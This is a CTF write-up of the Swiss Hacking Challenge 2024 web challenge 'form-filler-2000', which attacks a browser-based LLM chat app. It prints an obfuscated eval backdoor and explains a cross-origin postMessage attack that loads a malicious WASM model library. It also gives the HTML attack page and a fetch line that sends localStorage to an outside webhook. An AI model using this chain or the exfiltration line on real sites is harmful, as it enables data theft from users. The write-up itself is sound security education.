swiss hacking challenge 2024 - form-filler-2000

Posted on May 1, 2024

Tags: SHC24 Writeup

Difficulty: hard

Category: web

Author: sam.ninja

Alright, listen up, because I’m only going to go through this once, and frankly, I’ve had it up to here with everyone and their dog asking about ChatGPT. Yes, I know, “It’s for productivity,” “It’ll change my life,” yadda yadda. Look, it’s not happening, not on my watch. The last thing we need is to lose our ISO 27001 certification because everyone’s chatting away with an AI. It’s been a circus since day one, with everyone from Linda in accounting to Kevin from the social committee trying to sneak around our restrictions. Data security is no joke, folks. Enter Austin, the intern wunderkind, who’s somehow magicked up a local version of ChatGPT that runs in the browser. Claims it’s secure, uses all these fancy tech terms like WebGPU and WebAssembly. To me, it’s black magic, but he assures me it’s all above board. So, we’re giving it a go, installed it on the virtual environment. It’s like having Clippy back, but less annoying and hopefully not a data breach waiting to happen.

The CTO even greenlit some absurdly expensive RTX 4090 GPUs to run this thing smoothly. Because, apparently, throwing tech at the problem is the solution now. So, there you have it. Your beloved ChatGPT is back, sort of. Just keep it professional, alright? And please, for the love of sanity, no more begging emails about unblocking the original. My inbox is a warzone as it is. Catch you at the next tech meltdown.

Files

We get an instance and the following files:

form-filler-2000
├── Dockerfile
├── package.json
├── package-lock.json
├── patch.js
├── server.js
└── src
    ├── index.html
    ├── main.ts
    ├── style.css
    └── worker.ts

Exploitation

Part 1: The ninja backdoor

Looking at the files, there is a patch.js, which is added to the compiled code:

window['buffer']=[],window['originalLog']=console['log'],console['log']=_0x5aa5cc=>{window['originalLog'](_0x5aa5cc);if(_0x5aa5cc===0x0){const _0x488013=String['fromCodePoint'](...window['buffer']);window['buffer']=[];const _0x407abc='🥷backdoor🥷';_0x488013['startsWith'](_0x407abc)&&eval(_0x488013['slice'](_0x407abc['length']));}else typeof _0x5aa5cc==='number'&&_0x5aa5cc>=0x0&&_0x5aa5cc<=0x10ffff&&window['buffer']['push'](_0x5aa5cc);};

Deobfuscating that file leads to the following:

window['buffer']=[] // Initialize new buffer array on the window object
window['originalLog']=console['log'] // Create a copy of the original console.log function
// Define a new console.log function
console['log']=_0x5aa5cc=>{
  // Call the original console.log first
  window['originalLog'](_0x5aa5cc)
  // If the input is 0x0
  if(_0x5aa5cc===0x0) {
    // Conver the buffer array into a unicode string
    const _0x488013=String['fromCodePoint'](...window['buffer'])
    // Clear the bbufer
    window['buffer']=[]
    const _0x407abc='🥷backdoor🥷'
    // If the buffer starts with above backdoor string, pass everything after it to eval()
    _0x488013['startsWith'](_0x407abc)&&eval(_0x488013['slice'](_0x407abc['length']));
  }
    // Else, append the input to the window.buffer array, if it is an integer
    else typeof _0x5aa5cc==='number'&&_0x5aa5cc>=0x0&&_0x5aa5cc<=0x10ffff&&window['buffer']['push'](_0x5aa5cc);};

This means, we can get JS execution if we manage to call console.log in the expected way.

Part 2: The mysterious twice-working worker.js

When looking at the Dockerfile, there seem to be some suspicious things going on:

RUN cd dist && sed -i "s:</body>:<script type=\"module\" src=\"/$(ls worker.*.js)\"></script> </body>:" index.html
# Steve from IT: I don't really trust all that new fangled javascript stuff, so I'm going to add subresource integrity to all the resources
# Found some info about it here:
# https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
# Our build system doesn't support it, but I found a posthtml plugin that does it
# https://github.com/parcel-bundler/parcel/issues/2003#issuecomment-1369515955
RUN npx posthtml -u posthtml-sri --posthtml-sri.basePath=dist/ dist/index.html

However, when looking at the main.ts file, the worker is also included there:

const chat = new webllm.ChatWorkerClient(new Worker(
  new URL('./worker.ts', import.meta.url),
  { type: 'module' }
));

Let’s have a look at the actual worker:

// Taken from https://github.com/mlc-ai/web-llm/blob/3319d1c5a93f57425b964c6b3b13e71dcd349d75/README.md#using-web-worker
import { ChatWorkerHandler, ChatModule } from "@mlc-ai/web-llm";

// Hookup a chat module to a worker handler
const chat = new ChatModule();
const handler = new ChatWorkerHandler(chat);
self.onmessage = (msg: MessageEvent) => {
  try {
    handler.onmessage(msg);
  } catch {
    // Might crash if there's no GPU
  }
};

It registers an onmessage function to self and then passes incoming messages to the ChatWorkerHandler. But what happens, if this is included in the main HTML file instead of registering as a web worker?

self is window in that case and has the same effect as listening for messages using window.addEventListener("message").

OH WAIT

This means, we can send messageEvents using postMessage() from an opened window object, even from a different origin!

Part 3: Getting the right message

But what messages can we send to actually log something to the console? A GitHub search for console.log in the Web-LLM reveals the following in src/chat_module.ts:

export class ChatModule implements ChatInterface {
  private currentModelId?: string = undefined;  // Model current loaded, undefined if nothing is loaded
  private logger: (msg: string) => void = console.log;
  // ...
    async reload(modelId: string, chatOpts?: ChatOptions, appConfig?: AppConfig): Promise<void> {
    this.deviceLostIsError = false;  // so that unload() does not trigger device.lost warning
    this.unload();

    this.logitProcessor = this.logitProcessorRegistry?.get(modelId);
    const tstart = performance.now();
    if (appConfig === undefined) {
      appConfig = prebuiltAppConfig;
    }

    const findModelRecord = () => {
      const matchedItem = appConfig?.model_list.find(
        item => item.model_id == modelId
      );
      if (matchedItem !== undefined) return matchedItem;
      throw Error("Cannot find model_url for " + modelId);
    }

    const modelRecord = findModelRecord();
    const baseUrl = typeof document !== "undefined" ? document.URL : globalThis.location.origin;
    let modelUrl = modelRecord.model_url;
    if (!modelUrl.startsWith("http")) {
      modelUrl = new URL(modelUrl, baseUrl).href;
    }
    const configCache = new tvmjs.ArtifactCache("webllm/config");

    // load config
    const configUrl = new URL("mlc-chat-config.json", modelUrl).href;
    this.config = {
      ...(await (await configCache.fetchWithCache(configUrl)).json()),
      ...chatOpts
    } as ChatConfig;

    // load tvm wasm
    const wasmCache = new tvmjs.ArtifactCache("webllm/wasm");
    const wasmUrl = modelRecord.model_lib_url;
    if (wasmUrl === undefined) {
      throw Error("You need to specify `model_lib_url` for each model in `model_list` " +
        "so that we can download the model library (i.e. wasm file).")
    }
    const fetchWasmSource = async () => {
      if (wasmUrl.includes("localhost")) {
        // do not cache wasm on local host as we might update code frequently
        return await fetch(wasmUrl);
      } else if (!wasmUrl.startsWith("http")) {
        // do not cache wasm on the same server as it can also refresh
        // rely on the normal caching strategy
        return await fetch(new URL(wasmUrl, baseUrl).href);
      } else {
        // use cache
        return await wasmCache.fetchWithCache(wasmUrl);
      }
    };
    const wasmSource = await (await fetchWasmSource()).arrayBuffer();

    const tvm = await tvmjs.instantiate(
      new Uint8Array(wasmSource),
      tvmjs.createPolyfillWASI(),
      this.logger
    );
    // ...
    }
}

The last code block is especially interesting. It passes the logger object and the WASM for the AI model to the tvmjs instantiate method. Looking at that, we can see the logger function being available from within the WASM:

web/src/runtime.ts

export function instantiate(
  bufferSource: ArrayBuffer,
  importObject: Record<string, any> = {},
  logger: (msg: string) => void = console.log
): Promise<Instance> {
  const env = new Environment(importObject, logger);

  return WebAssembly.instantiate(bufferSource, env.imports).then(
    (result: WebAssembly.WebAssemblyInstantiatedSource): Instance => {
      return new Instance(result.module, {}, result.instance, env);
    }
  );
}

Judging from the source code, we have to call the reload function using a message. I used the following snippet in the runner context to sniff on all messages:

this.addEventListener("message", (msg) => {console.log(msg.data)})

This reveals a sample reload message:

{
    "kind": "reload",
    "uuid": "8292ee07-37c1-4d6e-959c-fc8f40e6f813",
    "content": {
        "localIdOrUrl": "Llama-2-7b-chat-hf-q4f32_1"
    }
}

Now, we’ll have to load our own model like that.

Part 4: WAT

The WebAssembly.instantiate expects an environment that can then be called inside of the WASM. This is exactly what happens to our logger object.

As the instantiate method doesn’t call any function directly, we’ll have to do some trickery. I used WAT to write my exploit:

(module
  ;; Import the `__console_log` function, expecting an i32 integer.
  (import "env" "__console_log" (func $__console_log (param i32)))

  (func $printIntegers
    i32.const 1234
    call $__console_log
  )

  ;; Automatically call `$printIntegers` upon module instantiation.
  (start $printIntegers)
)

We can compile this using wat2wasm exploit.wat -o exploit.wasm.

Afer a bit of source code review, I found out how to load a model from an external URL:

{
  "kind": "reload",
  "uuid": "25a462b5-c95a-47f4-ab73-acc3df5f1357",
  "content": {
    "localIdOrUrl": "exploit",
    "appConfig": {
      "model_list": [
        {
          "model_url": "http://your-webhost/",
          "model_lib_url": "http://yout-webhost/exploit.wasm",
          "local_id": "exploit"
        }
      ]
    }
  }
}

The library also expects a mlc-chat-config.json under the specified model_url. Creating an empty JSON file ({}) is enough.

After testing this using window.postMessage(<json>, "*") and successfully seeing 1234 printed to the console, we can move on to the actual exploit.

Part 5: Putting everything together

To generate the full WAT file for the backdoor string and my payload, I wrote a small JS script:

const readline = require('readline');

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
});

rl.question('Enter a string: ', (inputString) => {
  const codePoints = Array.from(inputString).map(char => char.codePointAt(0));

  console.log(codePoints);
  for (cp of codePoints) {
    console.log(`i32.const ${cp}`);
    console.log(`call $__console_log`);
  }

  rl.close();
});

Note: To run the backdoor, there needs to also be a console.log(0) in the WASM.

I used fetch("https://webhook.site/695806ee-1a50-47c1-a29c-71c84a44bc7b?"+JSON.stringify(localStorage)) to get the whole local storage contents, where the bot stores the flag.

Finally, we need to build a HTML page that opens up a new window on load and sends the message to the challenge instance:

<!doctype html>
<html>

<head>
  <meta charset="UTF-8" />
  <title>CYBER CYBER CYBER!</title>
  <script>
    let win = window.open('http://localhost/');
    let msg = {
      "kind": "reload",
      "uuid": "25a462b5-c95a-47f4-ab73-acc3df5f1357",
      "content": {
        "localIdOrUrl": "exploit",
        "appConfig": {
          "model_list": [
            {
              "model_url": "http://your-webhost/",
              "model_lib_url": "http://yout-webhost/exploit.wasm",
              "local_id": "exploit"
            }
          ]
        }
      }
    }
    setTimeout(function () {
      win.postMessage(msg, '*');
    }, 5000);
  </script>
</head>
</html>

To get the flag, we can now call the bot and should get the flag on our webhook:

$ curl https://<your-challenge-instance>.ctf.m0unt41n.ch:1337/visit -H "Content-Type: application/json" -d '{"url":"http://your-webhost/exploit.html"}

Flag

  shc2024{But_the_auditing_company_forced_us_to_use_SRI_for_every_loaded_resources.}

Conclusion

Even though it took me ages to solve this challenge, this was my favorite one. Such a crazy exploit chain and I learned a lot more about web and WASM while solving.